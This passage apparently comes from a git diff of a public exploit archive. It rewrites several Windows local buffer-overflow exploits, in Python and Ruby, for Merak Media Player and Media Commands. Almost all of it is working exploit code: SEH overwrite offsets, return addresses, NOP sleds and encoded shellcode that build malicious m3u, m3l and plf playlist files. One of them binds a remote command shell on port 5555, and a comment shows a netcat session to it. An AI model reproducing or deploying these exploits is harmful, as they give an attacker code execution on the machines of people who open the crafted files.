"\x64\x6f\x30\x30\x74\x43\x37\x7a\x61\x59\x5a\x36\x6d\x46\x61\x6a" + "\x62\x58\x6b\x7a\x54\x45\x6b\x76\x34\x47\x54\x64\x44\x53\x45\x79" + "\x75\x4c\x4b\x63\x6f\x51\x34\x67\x71\x4a\x4b\x50\x66\x4c\x4b\x76" + "\x6c\x30\x4b\x4c\x4b\x43\x6f\x67\x6c\x34\x41\x58\x6b\x6e\x6b\x75" + "\x4c\x6c\x4b\x37\x71\x38\x6b\x6c\x49\x63\x6c\x54\x64\x44\x44\x79" + "\x53\x50\x31\x69\x50\x63\x54\x4c\x4b\x63\x70\x34\x70\x4b\x35\x4f" + "\x30\x53\x48\x56\x6c\x6e\x6b\x71\x50\x76\x6c\x4c\x4b\x34\x30\x45" + "\x4c\x4c\x6d\x4e\x6b\x50\x68\x55\x58\x5a\x4b\x54\x49\x4c\x4b\x6f" + "\x70\x4e\x50\x55\x50\x63\x30\x75\x50\x4c\x4b\x72\x48\x55\x6c\x71" + 
"\x4f\x45\x61\x39\x66\x41\x70\x72\x76\x4f\x79\x6b\x48\x4d\x53\x4f" + "\x30\x73\x4b\x50\x50\x50\x68\x6a\x4f\x48\x4e\x6d\x30\x43\x50\x62" + "\x48\x6f\x68\x4b\x4e\x4f\x7a\x74\x4e\x46\x37\x39\x6f\x69\x77\x41" + "\x63\x50\x6f\x70\x6c\x75\x50\x65" + ) + +payload = garbage + eip + nop + shellcode + nop + +try: + out_file = open("Groundhog_Day.plf",'w') + out_file.write(payload) + out_file.close() + raw_input("\n\n[*] Evil playlist successfully created.\n\nPress any key to continue...") +except: + print "Oops!" + +# milw0rm.com [2009-02-04] diff --git a/platforms/windows/local/798.c b/platforms/windows/local/798.c index 09e59eb41..623d6251a 100755 --- a/platforms/windows/local/798.c +++ b/platforms/windows/local/798.c @@ -66,6 +66,6 @@ int main(void) return 0; } - - -// milw0rm.com [2005-02-08] + + +// milw0rm.com [2005-02-08] diff --git a/platforms/windows/local/8126.py b/platforms/windows/local/8126.py index 0fb634d9e..9ba8cde96 100755 --- a/platforms/windows/local/8126.py +++ b/platforms/windows/local/8126.py 
@@ -1,55 +1,55 @@ -#exploit.py -# -# Merak Media Player 3.2 Buffer Overflow Exploit(SEH) -# By:Encrypt3d.M!nd -# m1nd3d.wordpress.com -# -# Orginal Advisory: -# http://www.milw0rm.com/exploits/7857 -###################################################### -# Nothing Intersting in this exploit,too easy -# just improving my SEH exploitation Skills :p -# - -ns = "\xEB\x06\x90\x90" - -sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2 - -chars = "A" * 74 - -nops = "\x90" * 20 - - -# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum -http://metasploit.com - -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" -"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x33\x4b\x48\x4e\x37" -"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x48" -"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x38" -"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48" -"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" -"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x38" -"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37" -"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b" -"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53" -"\x48\x4f\x42\x56\x48\x45\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x47" -"\x42\x35\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x39" 
-"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" -"\x4e\x46\x43\x56\x50\x42\x45\x36\x4a\x37\x45\x36\x42\x30\x5a") - - -file=open('geek.m3u','w') -file.write(chars+ns+sh+nops+shellcode) -file.close() - -# milw0rm.com [2009-03-02] +#exploit.py +# +# Merak Media Player 3.2 Buffer Overflow Exploit(SEH) +# By:Encrypt3d.M!nd +# m1nd3d.wordpress.com +# +# Orginal Advisory: +# http://www.milw0rm.com/exploits/7857 +###################################################### +# Nothing Intersting in this exploit,too easy +# just improving my SEH exploitation Skills :p +# + +ns = "\xEB\x06\x90\x90" + +sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2 + +chars = "A" * 74 + +nops = "\x90" * 20 + + +# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum +http://metasploit.com + +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" +"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x33\x4b\x48\x4e\x37" +"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x48" +"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x38" +"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48" +"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" +"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x38" +"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37" +"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a" +"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b" 
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
+"\x42\x35\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
+"\x4e\x46\x43\x56\x50\x42\x45\x36\x4a\x37\x45\x36\x42\x30\x5a")
+
+
+file=open('geek.m3u','w')
+file.write(chars+ns+sh+nops+shellcode)
+file.close()
+
+# milw0rm.com [2009-03-02]
diff --git a/platforms/windows/local/8137.py b/platforms/windows/local/8137.py
index a98e78933..7aea96e9a 100755
--- a/platforms/windows/local/8137.py
+++ b/platforms/windows/local/8137.py
@@ -1,58 +1,58 @@ -#usage: exploit.py -print "**************************************************************************" -print " Media Commands (m3u File) local Seh Overwrite Exploit\n" -print " Founder: Hakxer" -print " Exploited: His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - - - -buff = "\x41" * 4103 - -next_seh = "\xEB\x06\x90\x90" - -seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv - -nop = "\x90" * 19 - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" - "\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47" - "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x58" - "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58" - "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" - "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38" - "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54" - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58" - "\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x33" - "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37" - "\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a" - "\x4b\x38\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" - "\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x33\x4f\x35\x41\x43" - "\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47" - 
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x55\x4a\x36\x4a\x49" - "\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x50\x36\x4f\x46" - "\x46\x47\x45\x56\x42\x57\x41\x56\x46\x56\x42\x30\x5a" - ) - -exploit = buff + next_seh + seh + nop + shellcode - -try: - out_file = open("exploit.m3u",'w') - out_file.write(exploit) - out_file.close() - print "Exploit File Created!" -except: - print "Error" - -# milw0rm.com [2009-03-02] +#usage: exploit.py +print "**************************************************************************" +print " Media Commands (m3u File) local Seh Overwrite Exploit\n" +print " Founder: Hakxer" +print " Exploited: His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + + + +buff = "\x41" * 4103 + +next_seh = "\xEB\x06\x90\x90" + +seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv + +nop = "\x90" * 19 + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode = ( + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" + "\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47" + "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x58" + "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58" + "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" + "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38" + "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54" + "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58" + 
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x33" + "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37" + "\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a" + "\x4b\x38\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" + "\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x33\x4f\x35\x41\x43" + "\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47" + "\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x55\x4a\x36\x4a\x49" + "\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x50\x36\x4f\x46" + "\x46\x47\x45\x56\x42\x57\x41\x56\x46\x56\x42\x30\x5a" + ) + +exploit = buff + next_seh + seh + nop + shellcode + +try: + out_file = open("exploit.m3u",'w') + out_file.write(exploit) + out_file.close() + print "Exploit File Created!" +except: + print "Error" + +# milw0rm.com [2009-03-02] diff --git a/platforms/windows/local/8159.rb b/platforms/windows/local/8159.rb index da3b7dc44..26daf174c 100755 --- a/platforms/windows/local/8159.rb +++ b/platforms/windows/local/8159.rb 
@@ -1,82 +1,82 @@ -#!/usr/bin/env ruby -# Media Commands .m3l Local Buffer Overflow Exploit -# By Mountassif Moad -# Down : http://www.mediacommands.com/download/&product=MCV100A.exe -# C:\nc>nc -v 127.0.0.1 5555 -# DNS fwd/rev mismatch: localhost != stack-f286641 -# localhost [127.0.0.1] 5555 (?) open -# Microsoft Windows XP [version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# C:\Program Files\Media Commands\Animation> -# exit Booooooooooom -time3 = Time.new -puts "Exploit Started in Current Time :" + time3.inspect -puts "Enter Name For your File Like : Stack" -moad = gets.chomp.capitalize -puts "Name Of File : " + moad +'.m3l' -time1 = Time.new -$VERBOSE=nil -Header = -"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+ -"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+ -"\x4F\x66\x45\x6E\x74\x72\x69\x65"+ -"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D" -# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com -Shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+ -"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+ -"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+ -"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+ -"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+ -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+ -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+ -"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+ -"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+ -"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+ -"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+ 
-"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
-"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
-"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
-"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
-"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
-"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
-"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
-"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
-"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
-"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
-"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
-"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
-"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
-"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
-"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
-"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
-"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
-"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
-"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
-"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
-"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
-"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+
-"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+
-"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+
-"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+
-"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+
-"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+ -"\x4f\x4f\x42\x4d\x5a" -Bof = "\x41" * 4097 -Nseh = "\xEB\x06\x90\x90" -seh = "\x35\x2F\xC6\x72" -Nop = "\x90" * 15 -crash = Header + Bof + Nseh + seh + Nop + Shellcode -File.open( moad+".m3l", "w" ) do |the_file| -the_file.puts(crash) -puts "Exploit finished in Current Time :" + time1.inspect -puts "Now Open " + moad +".m3l :d" -end - -# milw0rm.com [2009-03-05] +#!/usr/bin/env ruby +# Media Commands .m3l Local Buffer Overflow Exploit +# By Mountassif Moad +# Down : http://www.mediacommands.com/download/&product=MCV100A.exe +# C:\nc>nc -v 127.0.0.1 5555 +# DNS fwd/rev mismatch: localhost != stack-f286641 +# localhost [127.0.0.1] 5555 (?) open +# Microsoft Windows XP [version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# C:\Program Files\Media Commands\Animation> +# exit Booooooooooom +time3 = Time.new +puts "Exploit Started in Current Time :" + time3.inspect +puts "Enter Name For your File Like : Stack" +moad = gets.chomp.capitalize +puts "Name Of File : " + moad +'.m3l' +time1 = Time.new +$VERBOSE=nil +Header = +"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+ +"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+ +"\x4F\x66\x45\x6E\x74\x72\x69\x65"+ +"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D" +# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com +Shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+ +"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+ +"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+ +"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+ +"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+ 
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+
+"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+
+"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+
+"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+
+"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+
+"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
+"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
+"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
+"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
+"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
+"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
+"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
+"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
+"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
+"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
+"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
+"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
+"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
+"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
+"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
+"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
+"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
+"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
+"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
+"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
+"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
+"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+ +"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+ +"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+ +"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+ +"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+ +"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+ +"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+ +"\x4f\x4f\x42\x4d\x5a" +Bof = "\x41" * 4097 +Nseh = "\xEB\x06\x90\x90" +seh = "\x35\x2F\xC6\x72" +Nop = "\x90" * 15 +crash = Header + Bof + Nseh + seh + Nop + Shellcode +File.open( moad+".m3l", "w" ) do |the_file| +the_file.puts(crash) +puts "Exploit finished in Current Time :" + time1.inspect +puts "Now Open " + moad +".m3l :d" +end + +# milw0rm.com [2009-03-05] diff --git a/platforms/windows/local/8162.py b/platforms/windows/local/8162.py index d71798f02..5af9232c0 100755 --- a/platforms/windows/local/8162.py +++ b/platforms/windows/local/8162.py 
@@ -1,60 +1,60 @@ -#usage: exploit.py -print "**************************************************************************" -print " Media Commands (m3u File) Universal Seh Overwrite Exploit\n" -print " Founder: Hakxer" -print " Exploited by : His0k4" -print " Another Exploiter : Stack" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - - - -buff = "\x41" * 4103 - -next_seh = "\xEB\x06\x90\x90" - -seh = "\x9F\x20\x01\x10" #Universal pop pop ret :p - - -nop = "\x90" * 19 - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" 